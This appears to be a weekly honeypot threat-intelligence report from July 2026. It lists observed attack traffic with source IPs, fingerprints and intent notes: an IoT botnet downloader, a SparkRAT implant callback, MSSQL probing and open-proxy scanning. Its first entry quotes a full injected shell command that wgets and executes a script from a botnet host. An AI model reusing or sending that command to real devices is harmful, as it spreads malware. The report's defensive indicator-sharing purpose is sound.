# Weekly BP Report -- 2026-07-20 # Notable HTTP URL paths observed, ordered by detectability/signal value # Query range: 2026-07-13 through 2026-07-20 # IoT MIPS downloader (NEW observation - AS57043 Hostkey) /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh # Source: 132.243.194.215 (AS57043 Hostkey B.V. DE) # JA4H: ge11nn0400_777e992b8532 # Method: GET on port 6001 # Intent: Shellshock-style or webshell-triggered IoT botnet MIPS ELF downloader (mirai-variant custom) # Indicator: 3 events on 2026-07-16 between 00:21:43 and 03:43:00 UTC # References: aibotnet.su domain -- active C2 URL serving /bins/kla.sh MIPS binaries # SPARKRAT update callback (NEW observation - AS200651 FlokiNET Tor exit) /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows # Source: 185.100.87.136 (AS200651 PremiumTorExit Tor 0.4.9.11) # JA4H: po11nn0600_c9506d37ac14 # Method: POST with content-type "application/octet-stream" + secret header # Intent: SPARK-RAT implant callback confirming Windows 64/amd64 implant update -- commit-style versioning commits to C2 git # Indicator: 3 events on 2026-07-13, 5-hour window # References: GreyNoise confirms new tag "SparkRAT Client Update Scanner" on this host # Event Manager RESTful probing (NEW - AS200651 FlokiNET Tor exit) /eventmanager # Source: 185.100.87.136 (AS200651) # JA4H: ge11nn0400_88d30a62b7ad # Method: GET /eventmanager HTTP/1.1 on port 443 # Intent: SPARKRAT manager endpoint observation (subject to validation) # MSSQL TDS probing 1433 binary handshake (AS211720 Datashield) MSSQL TDS Pre-Login binary 0x120100 34 bytes with "MSSQLServer" string and hostname "short-tan-rat" # Source: 185.231.33.46 (AS211720) onto honeypot port 1433 # associated_jarm: 07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823 # Intent: SQL Server payload inspection / pre-login banner to identify MSSQL version for brute # Indicator: 2 events on 2026-07-16 and 2026-07-18 # Pfcloud's 8080/8081 proxy-style port range probing (AS51396) GET / HTTP/1.1 on diverse ports 8080, 8081, 8888, 8000, 3128 -- 491 events across one week # Source IP rotation: 45.135.193.193 (DE) primary; 45.135.194.10 (DE); 176.65.148.144 (NL); 204.76.203.30 (NL) # UA: Go-http-client/1.1 + zgrab/0.x + odin-scanner/0.4 + Hello World # Intent: Open proxy discovery -- scanning for proxy ports to abuse for proxy-rotation exfiltration tunnels